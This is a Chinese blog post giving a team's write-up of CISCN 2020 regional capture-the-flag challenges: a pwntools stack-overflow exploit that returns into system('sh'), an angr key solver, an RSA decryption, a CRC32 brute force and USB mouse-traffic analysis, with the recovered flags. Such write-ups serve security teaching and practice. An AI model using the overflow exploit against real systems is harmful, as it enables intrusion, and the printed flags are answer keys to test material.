ciscn2020_华中分区赛

简介:

这周参加了ciscn2020的分区赛,考试、四级、比赛挤在了一起着实难熬。由于今年疫情,分区赛化成了线上赛,比赛全程需开启摄像头直播、电脑录屏、手机录频等等一系列操作闪瞎了我的24k钛合金狗眼,但是该有的收获还是有的。

注:wp为队伍所有,为大家合作所得,非本人一力完成。

Pwn

基础-jichu

32位程序,开了NX保护,想到ROP

1

找到system函数

2

找到sh字符串

3

果然是一个基础题,找到这些,题目思路大概清晰了。栈溢出,覆盖为system函数,把’sh’字符串当做 参数传入,调用即可。或者可以再复杂一点,找一个bss段,写入bin/sh字符串,当参数传入system()函数。

贴出exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

p = process('./jichu')
#p = remote("172.20.10.10",50002)
elf = ELF('./jichu')
#context.log_level = 'debug'
system_addr = 0x080484D0
sh = 0x080482Ea

p.sendline('administrator')
payload = 'a'*0x48 + 'bbbb' + p32(system_addr) + 'aaaa' + p32(sh)
p.sendline('1')
p.sendline(payload) p.sendlineafter(':','4')
p.interactive()

Re

牢不可破

ida,反汇编

4

提示:unbreakable_enterprise_product_activation product-key

产品激活,密钥。考虑到函数的特殊性,可以考虑angr强行爆破。

angr是一个易用的二进制分析套件,可以用于做动态符号执行和多种静态分析。符号执行 (Symbolic Execution)是一种程序分析技术。其可以通过分析程序来得到让特定代码区域执行的输入。使用符号执 行分析一个程序时,该程序会使用符号值作为输入,而非一般执行程序时使用的具体值。在达到目标代 码时,分析器可以得到相应的路径约束,然后通过约束求解器来得到可以触发目标代码的具体值。[1]符 号模拟技术(symbolic simulation)则把类似的思想用于硬件分析。符号计算(Symbolic computation)则用于数学表达式分析。

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/env python
# -*- coding: utf-8 -*

import angr
import collections
def printModel(pg, string):
	print '=====' + string + '====='
	m = pg.found[0].state.se._solver.result.model
	od = collections.OrderedDict(sorted(m.items()))
	s = ''
	for k, v in od.iteritems():
		# print k, v
		s += chr(v)
	print s
def main():
	angr.l.setLevel('DEBUG')
	angr.analyses.veritesting.l.setLevel('DEBUG')
	p = angr.Project('./unbreakable-enterprise-product-activation', load_options={"auto_load_libs": False})
	
    s = p.factory.blank_state(addr=0x4005bd)
    for i in xrange(0, 67):
    	bvs = s.se.BVS('%03d' % i, 8)
    	if i == 0:
    		s.se.add(bvs == ord('C'))
    	s.memory.store(0x6042C0 + i, bvs)
    
    find_addrs = (0x400830, )
    avoid_addrs = ()
    pg = p.factory.path_group(s, immutable=False)
    pg.explore(find=find_addrs, avoid=avoid_addrs)
    print pg
    
    printModel(pg, 'ans')
    
if __name__ == '__main__':
	main()
# CTF{0The1Quick2Brown3Fox4Jumped5Over6The7Lazy8Fox9}

Crypto

baby

分析rsa代码,所有数据都已经给了,直接脚本解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# -*- coding: utf-8 -*-

from Crypto.PublicKey import RSA
from libnum import n2s,s2n
import uuid

flag = "flag{************}"
rsa = RSA.generate(4096,e=3)
p = rsa.p
d = rsa.d
e = rsa.e
N = rsa.n

c = 3442467842482561323703237574537907554035337622762971103210557480050349359873041624336261782731509068910003360547049942482415036862904844600484976674423604861710166033558576921438068555951948966099658902606725292551952345193132973996288566246138708754810511646811362017769063041425115712305629748341207792305694590742066971202523405301561233341991037374101265623265332070787449332991792097090044761973705909217137119649091313457206589803479797894924402017273543719924849592070328396276760381501612934039653

m = pow(c,d,N)
print(n2s(m))

# 注:python3脚本
#flag{4c466c3d0949118a3ca3319b43fe792bef9e94a19c8f666d2ec6c890034d88ba}

Misc

pic

图片隐写,stegsolve,有个7z头文件,save bin

5

保存后的7z压缩包是被加密过的,6个txt文件,每个文件3字节,爆破crc32

6

注:有两个crc值为0开头,crc计算结果为int型,首位0会舍弃,因此需要注意

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from zlib import crc32
import random
import string
char=string.printable
 
def crc32_f(data):
    return hex(crc32(data.encode()))
 
length=5
crc32_1=['0x40e61be5','0x91c7b4a0','0xf4fd5e1c','0x2658101','0x92d786fd','0x3b3ea6a']
#print(crc32_)
#print(type(crc32_))
flag=0
f=''
for crc in crc32_1:
    flag=0
    text=''
    for i in char:
        if flag==1:
            break
        for j in char:
            if flag==1:
                break
            for k in char:
                text=i+j+k
                #print(type(crc32_f(text)))
                if crc32_f(text)==crc:
                    f=f+text
                    print(f)
                    #print(crc)
                    flag=1
                    break

# 注:python3脚本
# flag{CRC32/233333}

Traffic

wireshark打开分析,usb数据流量信息

使用tshark提取usb协议的数据

7

鼠标流量数据信息为每四个字节,利用脚本进行提取坐标点

8

使用gnuplo将得出的坐标点画出来

9

利用镜像反转读取正常flag

1
ctf{the_cat_is_the_culprit}
本文作者: foxcookie
发布时间: 2020-09-20
最后更新: 2023-07-21
本文标题: ciscn2020_华中分区赛
本文链接: https://foxcookie.github.io/2020/09/20/ciscn2020-华中分区赛/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明出处!

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

歪比巴卜?